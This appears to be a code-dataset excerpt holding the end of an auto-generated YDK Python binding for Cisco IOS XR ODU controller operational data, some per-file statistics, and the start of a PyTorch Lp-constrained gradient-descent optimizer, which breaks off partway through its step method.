.. attribute:: ext_tunnel_id
Ext Tunnel Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_source
FEC Source
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_dest
FEC Dest
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: s2l_fec_p2mp_id
P2MP Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: sub_group_origin_ator
SubGroup Originator
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: fec_c_type
Ctype
**type**\: :py:class:`OtmMplsLibC <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmMplsLibC>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt, self).__init__()
self.yang_name = "lb-ctxt"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('s2l_fec_sub_group_id', (YLeaf(YType.uint16, 's2l-fec-sub-group-id'), ['int'])),
('s2l_fec_lsp_id', (YLeaf(YType.uint16, 's2l-fec-lsp-id'), ['int'])),
('s2l_fec_tunnel_id', (YLeaf(YType.uint16, 's2l-fec-tunnel-id'), ['int'])),
('ext_tunnel_id', (YLeaf(YType.uint32, 'ext-tunnel-id'), ['int'])),
('fec_source', (YLeaf(YType.uint32, 'fec-source'), ['int'])),
('fec_dest', (YLeaf(YType.uint32, 'fec-dest'), ['int'])),
('s2l_fec_p2mp_id', (YLeaf(YType.uint32, 's2l-fec-p2mp-id'), ['int'])),
('sub_group_origin_ator', (YLeaf(YType.uint32, 'sub-group-origin-ator'), ['int'])),
('fec_c_type', (YLeaf(YType.enumeration, 'fec-c-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OtmMplsLibC', '')])),
])
self.s2l_fec_sub_group_id = None
self.s2l_fec_lsp_id = None
self.s2l_fec_tunnel_id = None
self.ext_tunnel_id = None
self.fec_source = None
self.fec_dest = None
self.s2l_fec_p2mp_id = None
self.sub_group_origin_ator = None
self.fec_c_type = None
self._segment_path = lambda: "lb-ctxt"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt, ['s2l_fec_sub_group_id', 's2l_fec_lsp_id', 's2l_fec_tunnel_id', 'ext_tunnel_id', 'fec_source', 'fec_dest', 's2l_fec_p2mp_id', 'sub_group_origin_ator', 'fec_c_type'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.LbCtxt']['meta_info']
class PassiveMatch(_Entity_):
"""
Passive Match
.. attribute:: src_tid
Src TId
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: src_rid
Src RId
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch, self).__init__()
self.yang_name = "passive-match"
self.yang_parent_name = "te-tunnel-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('src_tid', (YLeaf(YType.uint16, 'src-tid'), ['int'])),
('src_rid', (YLeaf(YType.uint32, 'src-rid'), ['int'])),
])
self.src_tid = None
self.src_rid = None
self._segment_path = lambda: "passive-match"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch, ['src_tid', 'src_rid'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo.PassiveMatch']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData.TeTunnelInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.XcRemCtxData']['meta_info']
class OduDelay(_Entity_):
"""
ODU Delay
.. attribute:: mode
Latency Mode
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: delay
Delay Value
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.OduDelay, self).__init__()
self.yang_name = "odu-delay"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mode', (YLeaf(YType.uint8, 'mode'), ['int'])),
('delay', (YLeaf(YType.uint32, 'delay'), ['int'])),
])
self.mode = None
self.delay = None
self._segment_path = lambda: "odu-delay"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.OduDelay, ['mode', 'delay'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.OduDelay']['meta_info']
class OduTerminateEther(_Entity_):
"""
odu terminate ether
.. attribute:: vether_ifhandle
interface handle
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ethernet_mapping
ethernet mapping
**type**\: :py:class:`OduEtherMapPingEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduEtherMapPingEt>`
**config**\: False
.. attribute:: ethernet_interface
Ethernet interface name
**type**\: str
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.OduTerminateEther, self).__init__()
self.yang_name = "odu-terminate-ether"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('vether_ifhandle', (YLeaf(YType.uint32, 'vether-ifhandle'), ['int'])),
('ethernet_mapping', (YLeaf(YType.enumeration, 'ethernet-mapping'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduEtherMapPingEt', '')])),
('ethernet_interface', (YLeaf(YType.str, 'ethernet-interface'), ['str'])),
])
self.vether_ifhandle = None
self.ethernet_mapping = None
self.ethernet_interface = None
self._segment_path = lambda: "odu-terminate-ether"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.OduTerminateEther, ['vether_ifhandle', 'ethernet_mapping', 'ethernet_interface'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.OduTerminateEther']['meta_info']
class AinsInfo(_Entity_):
"""
AINS information
.. attribute:: ains_state
AINS State
**type**\: :py:class:`OduAinsStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduAinsStateEt>`
**config**\: False
.. attribute:: ains_timer_minutes
AINS Timer in Minutes
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: minute
.. attribute:: ains_remaining_secs
AINS Remaining Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.AinsInfo, self).__init__()
self.yang_name = "ains-info"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ains_state', (YLeaf(YType.enumeration, 'ains-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduAinsStateEt', '')])),
('ains_timer_minutes', (YLeaf(YType.uint32, 'ains-timer-minutes'), ['int'])),
('ains_remaining_secs', (YLeaf(YType.uint32, 'ains-remaining-secs'), ['int'])),
])
self.ains_state = None
self.ains_timer_minutes = None
self.ains_remaining_secs = None
self._segment_path = lambda: "ains-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.AinsInfo, ['ains_state', 'ains_timer_minutes', 'ains_remaining_secs'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.AinsInfo']['meta_info']
class Odu_(_Entity_):
"""
Child Ts
.. attribute:: intf_name
Child Interface Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: tpn_value
Tpn Bitmap
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ts_bitmap
Ts Bitmap
**type**\: str
**length:** 0..256
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odu_, self).__init__()
self.yang_name = "odu"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('intf_name', (YLeaf(YType.str, 'intf-name'), ['str'])),
('tpn_value', (YLeaf(YType.uint8, 'tpn-value'), ['int'])),
('ts_bitmap', (YLeaf(YType.str, 'ts-bitmap'), ['str'])),
])
self.intf_name = None
self.tpn_value = None
self.ts_bitmap = None
self._segment_path = lambda: "odu"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odu_, ['intf_name', 'tpn_value', 'ts_bitmap'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odu_']['meta_info']
class Odutcm(_Entity_):
"""
ODU TCM
.. attribute:: tcmtti_mode
TTI
**type**\: :py:class:`TcmttiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode>`
**config**\: False
.. attribute:: tcmsf
ODU TCM SF in the form of 1.0E \- <SF>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: tcmsd
ODU TCM SD in the form of 1.0E \- <SD>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: tcm_state
ODU TCM state
**type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
**config**\: False
.. attribute:: tcmper_mon
Performance Monitoring
**type**\: :py:class:`OduTcmPerMon <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmPerMon>`
**config**\: False
.. attribute:: tcm_mode
ODU TCM Mode
**type**\: :py:class:`OduTcmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmMode>`
**config**\: False
.. attribute:: actual_tcm_mode
TCM Mode in H/W
**type**\: :py:class:`OduTcmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmMode>`
**config**\: False
.. attribute:: tcmltc_state
ODU TCM LTC CA state
**type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
**config**\: False
.. attribute:: tcmtim_state
ODU TCM TIM CAstate
**type**\: :py:class:`OduTcmStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTcmStateEt>`
**config**\: False
.. attribute:: tcm_delay
ODU TCM DELAY
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odutcm, self).__init__()
self.yang_name = "odutcm"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("tcmtti-mode", ("tcmtti_mode", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode))])
self._leafs = OrderedDict([
('tcmsf', (YLeaf(YType.uint8, 'tcmsf'), ['int'])),
('tcmsd', (YLeaf(YType.uint8, 'tcmsd'), ['int'])),
('tcm_state', (YLeaf(YType.enumeration, 'tcm-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
('tcmper_mon', (YLeaf(YType.enumeration, 'tcmper-mon'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmPerMon', '')])),
('tcm_mode', (YLeaf(YType.enumeration, 'tcm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmMode', '')])),
('actual_tcm_mode', (YLeaf(YType.enumeration, 'actual-tcm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmMode', '')])),
('tcmltc_state', (YLeaf(YType.enumeration, 'tcmltc-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
('tcmtim_state', (YLeaf(YType.enumeration, 'tcmtim-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTcmStateEt', '')])),
('tcm_delay', (YLeaf(YType.uint32, 'tcm-delay'), ['int'])),
])
self.tcmsf = None
self.tcmsd = None
self.tcm_state = None
self.tcmper_mon = None
self.tcm_mode = None
self.actual_tcm_mode = None
self.tcmltc_state = None
self.tcmtim_state = None
self.tcm_delay = None
self.tcmtti_mode = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode()
self.tcmtti_mode.parent = self
self._children_name_map["tcmtti_mode"] = "tcmtti-mode"
self._segment_path = lambda: "odutcm"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm, ['tcmsf', 'tcmsd', 'tcm_state', 'tcmper_mon', 'tcm_mode', 'actual_tcm_mode', 'tcmltc_state', 'tcmtim_state', 'tcm_delay'], name, value)
class TcmttiMode(_Entity_):
"""
TTI
.. attribute:: tx
String Sent
**type**\: :py:class:`Tx <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx>`
**config**\: False
.. attribute:: exp
String Expected
**type**\: :py:class:`Exp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp>`
**config**\: False
.. attribute:: rec
String Received
**type**\: :py:class:`Rec <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec>`
**config**\: False
.. attribute:: g709tti_sent_mode
G709TTI Sent
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_exp_mode
G709TTI Expected
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_rec_mode
G709TTI Recieved
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode, self).__init__()
self.yang_name = "tcmtti-mode"
self.yang_parent_name = "odutcm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("tx", ("tx", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx)), ("exp", ("exp", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp)), ("rec", ("rec", Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec))])
self._leafs = OrderedDict([
('g709tti_sent_mode', (YLeaf(YType.enumeration, 'g709tti-sent-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
('g709tti_exp_mode', (YLeaf(YType.enumeration, 'g709tti-exp-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
('g709tti_rec_mode', (YLeaf(YType.enumeration, 'g709tti-rec-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
])
self.g709tti_sent_mode = None
self.g709tti_exp_mode = None
self.g709tti_rec_mode = None
self.tx = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx()
self.tx.parent = self
self._children_name_map["tx"] = "tx"
self.exp = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp()
self.exp.parent = self
self._children_name_map["exp"] = "exp"
self.rec = Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec()
self.rec.parent = self
self._children_name_map["rec"] = "rec"
self._segment_path = lambda: "tcmtti-mode"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode, ['g709tti_sent_mode', 'g709tti_exp_mode', 'g709tti_rec_mode'], name, value)
class Tx(_Entity_):
"""
String Sent
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx, self).__init__()
self.yang_name = "tx"
self.yang_parent_name = "tcmtti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "tx"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Tx']['meta_info']
class Exp(_Entity_):
"""
String Expected
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp, self).__init__()
self.yang_name = "exp"
self.yang_parent_name = "tcmtti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "exp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Exp']['meta_info']
class Rec(_Entity_):
"""
String Received
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec, self).__init__()
self.yang_name = "rec"
self.yang_parent_name = "tcmtti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "rec"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode.Rec']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm.TcmttiMode']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Odutcm']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers']['meta_info']
def clone_ptr(self):
self._top_entity = Odu()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu']['meta_info']
| 43.627279
| 5,724
| 0.403089
| 36,019
| 476,279
| 5.025153
| 0.016658
| 0.030409
| 0.038011
| 0.098077
| 0.88173
| 0.864459
| 0.824344
| 0.792846
| 0.749488
| 0.731902
| 0
| 0.022584
| 0.504097
| 476,279
| 10,916
| 5,725
| 43.631275
| 0.743759
| 0.19425
| 0
| 0.699879
| 0
| 0.000241
| 0.131268
| 0.03375
| 0
| 0
| 0
| 0
| 0.055006
| 1
| 0.08661
| false
| 0.007479
| 0.035223
| 0
| 0.22509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fdb07e1fc3279cf9302796453b1c0ae8dd70b79a
| 48
|
py
|
Python
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | 2
|
2022-02-28T17:23:49.000Z
|
2022-02-28T20:27:25.000Z
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | 2
|
2022-02-22T14:27:44.000Z
|
2022-02-22T21:07:19.000Z
|
fuel/__init__.py
|
opticrd/fuel-price-extractor-api
|
ce585f3246f4541116b4d1e43a6742d8c285697a
|
[
"MIT"
] | null | null | null |
from .main import Prices
from .main import Fuel
| 16
| 24
| 0.791667
| 8
| 48
| 4.75
| 0.625
| 0.421053
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 25
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fdbe42f8b197c01152cc9309aeb28cc705dccf8b
| 11,989
|
py
|
Python
|
optimizer/lpcgd.py
|
WilliamLiPro/LpSS_demo
|
3f53a2a9c44a3857a8eb95e6fc44b8409ce363f4
|
[
"Apache-2.0"
] | 2
|
2020-10-30T00:47:17.000Z
|
2021-08-21T09:36:02.000Z
|
optimizer/lpcgd.py
|
WilliamLiPro/LpSS
|
9c8cbc17f2662b244f8764508bb2f3b6f077c34f
|
[
"Apache-2.0"
] | null | null | null |
optimizer/lpcgd.py
|
WilliamLiPro/LpSS
|
9c8cbc17f2662b244f8764508bb2f3b6f077c34f
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch.optim.optimizer import Optimizer, required
import myFunction as myF
class LpCGD(Optimizer):
r"""Implements Lp constrained gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
net_lp (list): Lp norm of weight for each layer
lr (float): learning rate
lr_decay (float): decay of learning rate (default: 0)
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
"""
def __init__(self, model, net_lp, lp_layers: list = ['conv', 'fc'], min_input_channel: int = 2, forbid_layers: int = 1,
lr=required, lr_decay: float = 0,
momentum: float = 0, dampening: float = 0,
weight_decay: float = 0, nesterov=False):
# other set
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if lr_decay < 0.0:
raise ValueError("Invalid lr_decay rate: {}".format(lr_decay))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, lr_decay=lr_decay, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
self.sum_iter = 0
self.general_norm = 1
self.net_lp = net_lp
self.lp_layers = lp_layers
self.min_input_channel = min_input_channel
self.forbid_layers = forbid_layers * 2
namelist = []
for name, param in model.named_parameters():
namelist.append(name)
self.name_list = namelist
super(LpCGD, self).__init__(model.parameters(), defaults)
self.weightNormalize()
def weightNormalize(self):
# normalized weight
# fill the lp for normalization
layer_n = len(self.name_list)
net_lp = [None] * layer_n
count = 0
for i, name in enumerate(self.name_list):
if i >= layer_n - self.forbid_layers:
break
if (True in [lp_layer in name for lp_layer in self.lp_layers]) and 'weight' in name:
net_lp[i] = self.net_lp[count]
count += 1
self.net_lp = net_lp
# normalized weight
for group in self.param_groups:
for i, p in enumerate(group['params']):
if p.data is None or net_lp[i] is None:
continue
cp = p.data
if cp.dim() < 2 or cp.dim() > 4 or cp.size(1) < self.min_input_channel:
net_lp[i] = None
continue
p.data, _ = myF.LpNormalize_cnn(cp, net_lp[i])
def __setstate__(self, state):
super(LpCGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
net_lp = self.net_lp
for group in self.param_groups:
# update learning ratio
cur_lr = group['lr'] / (1 + group['lr_decay'] * self.sum_iter)
self.sum_iter += 1
# params
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for i, p in enumerate(group['params']):
# gradient
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
param_state = self.state[p]
if momentum != 0:
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# normalized gradient
